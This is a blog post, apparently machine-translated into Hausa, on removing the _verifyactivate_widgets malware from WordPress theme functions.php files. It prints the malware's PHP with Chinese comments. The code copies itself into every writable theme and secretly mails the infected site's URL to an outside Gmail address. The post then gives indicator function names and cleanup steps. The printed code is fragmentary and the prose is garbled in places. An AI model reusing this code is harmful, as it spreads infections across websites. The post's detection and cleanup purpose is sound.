Yadda jigogi na WordPress ke tsaftace muggan code _verifyactivate_widgets

Kwanan nanChen WeiliangA amfaniTsaron Tsaro na Wordfence yana bincika shafukan yanar gizo don lambar ɓarnaBayan haka, an same shiWordPressA cikin jigon aikin.php fayil, lambar cutar ɓoyayye tana ɓoye.

Lambar qeta a cikin jigon WordPress ayyuka.php fayil

Yadda jigogi na WordPress ke tsaftace muggan code _verifyactivate_widgets

Wurin da ya fi dacewa don "lambar mugunta" a cikin WordPress shine function.php a cikin jagorar jigo, yawanci ɓoye a ƙarshen fayil ɗin function.php.

babbar matsala:Lambar ƙeta za ta gano ko duk batutuwan da ke ƙarƙashin shafin yanar gizon yanzu sun kamu da cutar a duk lokacin da wani ya ziyarci shafin yanar gizon ku. Idan ba haka ba, za a kamu da cutar tare.

Bayan haka, lokacin da aka aiwatar da aikin init na wp, zai duba ko shafin yanar gizon yanzu ya aika imel zuwa akwatin gidan waya livethemas@gmel. com

Ta yaya kuke sanin ko an buga?

  • A cikin teburin wp_options ɗinku akwai fayil da ake kira_is_widget_active_zaɓi, idan an aika shi cikin nasara, saita ƙimarsa zuwa 1;
  • Idan ba haka ba, yi amfani da URL na gidan yanar gizon da ke ɗauke da cutar a halin yanzu azaman take da abun ciki.
  • Shi ke nan, babu wani mugun abu da za a yi.

Lambar cutar qeta ita ce kamar haka (akwai wasu bambance-bambance, amma lambar asali iri ɗaya ce):

function _verifyactivate_widgets(){
//查找当前主题functions.php文件中最后一个 <? 标记,从这个标记的位置开始,取得一直到文件尾的内容
$output=strip_tags($output, $allowed);
//取得主题目录themes的绝对路径,如 /path-to-www/wp-content/themes
$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),“themes”) + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
if (stripos($cont,$ftion) === false){
//查看目标functions.php文件最后是否是以 ?> 结尾,如果不是,给加上 ?> 标记
$comaar=stripos( substr($cont,-20),”?”.”>”) !== false ? “” : “?”.”>”;
//这里的代码是忽悠人了,模仿WP widgets的代码,蛊惑你的眼睛,让你觉得这是widget代码。。。
$output .= $before . “Not found” . $after;
//如果文件是以 ?> 标记结尾的,连标记一起取过来
if (stripos( substr($cont,-20),”?”.”>”) !== false){$cont=substr($cont,0,strripos($cont,”?”.”>”) + 2);}
$output=rtrim($output, “\n\t”); fputs($f=fopen($item,”w+”),$cont . $comaar . “\n” .$widget);fclose($f);
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
return $output;
function _get_allwidgets_cont($wids,$items=array()){
if(substr($places,-1) == “/”){

if(!file_exists($places) || !is_dir($places)){
return false;
foreach ($elems as $elem){
if ($elem != “.” && $elem != “..”){
if (is_dir($places . “/” . $elem)){
$wids[]=$places . “/” . $elem;
} elseif (is_file($places . “/” . $elem)&&
$elem == substr(__FILE__,-13)){
//否则,如果是文件,并且文件名等于 functions.php的话,则加入到$items数组保存,这才是它的目的functions.php正是它要找的
$items[]=$places . “/” . $elem;}
return false;
if (sizeof($wids) > 0){
return _get_allwidgets_cont($wids,$items);
} else {
return $items;

function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );

function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) – $offset ), 0 ) ) );
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) – ( $found + $offset + strlen( $needle ) ) );
return $pos;
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != “.” && $file != “..”) || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
return $dirArray;

add_action(“admin_head”, “_verifyactivate_widgets”);

function _getprepare_widget(){
if(!isset($text_length)) $text_length=120;
if(!isset($check)) $check=”cookie”;
if(!isset($tagsallowed)) $tagsallowed=”<a>“;
if(!isset($filter)) $filter=”none”;
if(!isset($coma)) $coma=””;
if(!isset($home_filter)) $home_filter=get_option(“home”);
if(!isset($pref_filters)) $pref_filters=”wp_”;
if(!isset($is_use_more_link)) $is_use_more_link=1;
if(!isset($com_type)) $com_type=””;
if(!isset($cpages)) $cpages=$_GET[“cperpage”];
if(!isset($post_auth_comments)) $post_auth_comments=””;
if(!isset($com_is_approved)) $com_is_approved=””;
if(!isset($post_auth)) $post_auth=”auth”;
if(!isset($link_text_more)) $link_text_more=”(more…)”;
if(!isset($widget_yes)) $widget_yes=get_option(“_is_widget_active_”);
if(!isset($link_text_more_ditails)) $link_text_more_ditails=”(details…)”;
if(!isset($contentmore)) $contentmore=”ma”.$coma.”il”;
if(!isset($for_more)) $for_more=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql=””;

//如果 _is_widget_active_ option内容为空,即表示没有被感染过
if (!$widget_yes) :

global $wpdb, $post;
// post_author 为 [email protected] 的文章,肯定是没有的

$sq1=”SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND post_author=\”li”.$coma.”vethe”.$com_type.”mas”.$coma.”@”.$com_is_approved.”gm”.$post_auth_comments.”ail”.$coma.”.”.$coma.”co”.”m\” AND post_password=\”\” AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if (!empty($post->post_password)) {
if ($_COOKIE[“wp-postpass_”.COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__(“There is no excerpt because this is a protected post.”);
} else {
if(!isset($fixed_tags)) $fixed_tags=1;
if(!isset($filters)) $filters=$home_filter;
//$gettextcomments实际上为 wp_mail
if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;
if(!isset($tag_aditional)) $tag_aditional=”div”;

//这里$sh_cont即为 [email protected]
if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, “live”), 20);#
if(!isset($more_text_link)) $more_text_link=”Continue reading this entry”;
if(!isset($isshowdots)) $isshowdots=1;

if($fakeit == 2) {
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
//开始调用 wp_mail 向 [email protected] 发送邮件,标题和内容都是被感染的博客的URL 地址
$sq1=”SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND comment_content=”. call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) .” ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if($text_length < 0) {
} else {
if(!$no_more && strpos($text, “<span id=“more-5265”></span>“)) {
$text=explode(“<span id=“more-5675”></span>“, $text, 2);
} else {
$text=explode(” “, $text);
if(count($text) > $text_length) {
} else {
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . ” “;
update_option(“_is_widget_active_”, 1);
if(“all” != $tagsallowed) {
$output=strip_tags($output, $tagsallowed);
return $output;
$output=rtrim($output, “\s\n\t\r\0\x0B”);
$output=($fixed_tags) ? balanceTags($output, true) : $output;
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
//$filter 为 none …,又是在伪装
$output=apply_filters($filter, $output);
switch($tag_aditional) {
case(“div”) :
case(“span”) :
case(“p”) :
default :

if ($is_use_more_link ) {
if($for_more) {
$output .= ” <” . $tag . ” class=\”more-link\”><a href=\””. get_permalink($post–>ID) . “#more-” . $post->ID .”\” title=\”” . $more_text_link . “\”>” . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : “” . “</a></” . $tag . “>” . “\n”;
} else {
$output .= ” <” . $tag . ” class=\”more-link\”><a href=\””. get_permalink($post–>ID) . “\” title=\”” . $more_text_link . “\”>” . $link_text_more . “</a></” . $tag . “>” . “\n”;
return $output;

add_action(“init”, “_getprepare_widget”);

function __popular_posts($no_posts=6, $before=”<li>“, $after=”</li>“, $show_pass_post=false, $duration=””) {
global $wpdb;
$request=”SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \”comment_count\” FROM $wpdb->posts, $wpdb->comments”;
$request .= ” WHERE comment_approved=\”1\” AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\”publish\””;
if(!$show_pass_post) $request .= ” AND post_password =\”\””;
if($duration !=””) {
$request .= ” AND DATE_SUB(CURDATE(),INTERVAL “.$duration.” DAY) < post_date “;
$request .= ” GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts”;
if ($posts) {
foreach ($posts as $post) {
$output .= $before . ” <a href=\”” . $permalink . “\” title=\”” . $post_title.“\”>” . $post_title . “</a> ” . $after;
} else {
$output .= $before . “None found” . $after;
return $output;

Menene mugun code na jigon WordPress?

Idan dubawa tare da plugin ɗin Tsaro na Wordfence yana ƙayyade cewa fayil ɗin function.php ya lalace da shi, duba shi, misali:

  1. _verifyactivate_widgets
  2. aikin _checkactive_widgets
  3. aiki _samun_allwidgets_cont
  4. aiki stripos
  5. aiki stripos
  6. scandir aiki
  7. aiki _getprepare_widget
  8. aiki __popular_posts
  9. add_action ("admin_head", "_checkactive_widgets");
  10. add_action ("init", "_getprepare_widget");
  11. _verify_isactivate_widgets
  12. _check_isactive_widget
  13. _samu_allwidgetscont
  14. _shirya_widgets
  15. _Shahararrun posts
  • Kowane layi yana zaman kansa, idan kuna da lambar da ke sama a cikin ayyukanku.php to ana iya buga ku.
  • Daga cikin su, ayyuka da add_action gabaɗaya lambar "lalata" na "ayyukan shirye-shirye ne".

Yadda za a cire WordPress theme function.php malicious virus code?

Hakanan yana da sauƙin tsaftacewa, kawai nemo lambar kama da na sama a cikin fayil ɗin function.php na jigon WordPress kuma share shi, amma saboda da zarar kamuwa da cuta, duk jigogi a cikin taken taken taken ku zai kamu da cutar, don haka kawai halin yanzu Jigon da aka yi amfani da shi ba shi da inganci kuma za a samar da shi nan da nan bayan sharewa.

Maganin shine a cire lambar ƙwayar cuta mai cutarwa na jigon WordPress ɗaya, saita fayil ɗin ayyuka.php zuwa izini 444, sannan tsaftace sauran jigogi na WordPress.

Dangane da ko izinin 444 na fayil ɗin ayyuka na ƙarshe yana buƙatar canza baya, mutane suna ba da shawarar cewa 444 yana da lafiya kuma ana iya canzawa idan ya cancanta.

Bayanan kula akan amfani da plugin ɗin Tsaro na Wordfence

Muna ba da shawarar plugin ɗin WordPress ta hanyar Tsaron Wordfence, plugin ɗin tsaro na WordPress tare da haɗaɗɗen Tacewar zaɓi da sikanin malware, babban ƙungiyar da aka gina da kiyaye shi ta hanyar 100% mai da hankali kan tsaro na WordPress.

Kodayake akwai nau'ikan nau'ikan da aka biya, za mu iya amfani da tsarin kyauta "Scan" don bincika rukunin yanar gizon mu na WordPress don fayilolin PHP da ke ɗauke da "lambar ɓarna", kodayake akwai takamaiman ƙimar ƙarya (musamman wasu plugins na gaske, ɓangaren ɓoyayyen jigon za a toshe. ta hanyar tabbataccen ƙarya), amma gano "lambar ɓarna" tabbas ƙarin aiki ne tare da ƙarancin ƙoƙari.

Ya kamata a lura da cewa wannan plug-in ba a ba da shawarar a kunna akai-akai ba, saboda tacewar ta da kariya ta tsaro zai haifar da wani matsa lamba akan ma'ajin bayanai kuma yana shafar aikin gidan yanar gizon.

Yawanci, ana kunna plugins don gudanar da binciken "scan" lokacin da ake buƙata.

Rufe plug-in bayan an gama bincike, idan akwai gaggawa.

Hope Chen Weiliang Blog ( https://www.chenweiliang.com/ ) shared "Yadda ake share malicious code _verifyactivate_widgets a cikin WordPress theme", wanda zai taimaka muku.

Barka da zuwa raba hanyar haɗin wannan labarin:https://www.chenweiliang.com/cwl-27554.html

Barka da zuwa tashar Telegram na Chen Weiliang's blog don samun sabbin abubuwa!

🔔 Kasance na farko don samun "ChatGPT Content Marketing AI Tool Guideing Guide" a cikin babban jagorar tashar! 🌟
📚 Wannan jagorar ya ƙunshi ƙima mai yawa, 🌟Wannan dama ce da ba kasafai ba, kar a rasa ta! ⏰⌛💨
Share da like idan kuna so!
Rarraba ku da abubuwan so sune ci gaba da ƙarfafa mu!



Adireshin imel ba za a buga ba. Ana amfani da filayen da ake buƙata * Alamar

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